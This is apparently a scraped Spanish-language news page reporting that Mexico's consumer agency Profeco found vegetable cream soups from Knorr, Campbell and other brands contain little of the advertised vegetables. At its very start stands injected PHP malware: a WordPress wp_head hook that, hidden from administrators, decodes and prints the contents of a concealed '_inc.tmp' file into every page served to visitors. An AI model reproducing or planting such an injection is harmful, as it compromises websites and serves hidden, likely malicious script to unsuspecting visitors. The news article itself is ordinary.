if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Profeco señala marcas engañosas de crema de verduras – Reporte Noreste
Conéctate con nosotros

Nal / Int

Profeco señala marcas engañosas de crema de verduras

Profeco señala marcas engañosas de crema de verduras

La Procuraduría Federal del Consumidor (profeco) publicó esta semana las marcas de cremas de verduras que declaran información falsa o errónea en sus etiquetas.

Los análisis reportados por la Profeco han informado de marcas de cremas de verduras que engañan y abusan de querer mostrar algo como saludable cuando no lo es, ya que muchos de estos contienen alrededor de 1% de los vegetales que presuntamente tienen.

El análisis de 18 presentaciones de cremas informan que la marca Knorr tendría únicamente 1.4% de elote, así como de esta misma marca se evaluó su crema de champiñones la cual sólo contendría 0.9% de dicho vegetal y 0.8% en su presentación de chile poblano.

La marca Campbell contiene 15% de verduras en cada una de sus presentaciones señalando que en su presentación de chile poblano solo con tendría un 5% y en su presentación de queso solo un 1%.

La marca extra especial tendría un 25% de alcachofa y de champiñones tendría un 21% de los hongos, mientras que la marca portobelo tendrá un 31% de verduras en cada una de sus presentaciones.

Subraya que estas sopas de verduras contiene una gran cantidad de azúcares y sodio haciendo un llamado a la población a tomar en cuenta de su gran cantidad engrosadores como almidones y saborizantes.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Nal / Int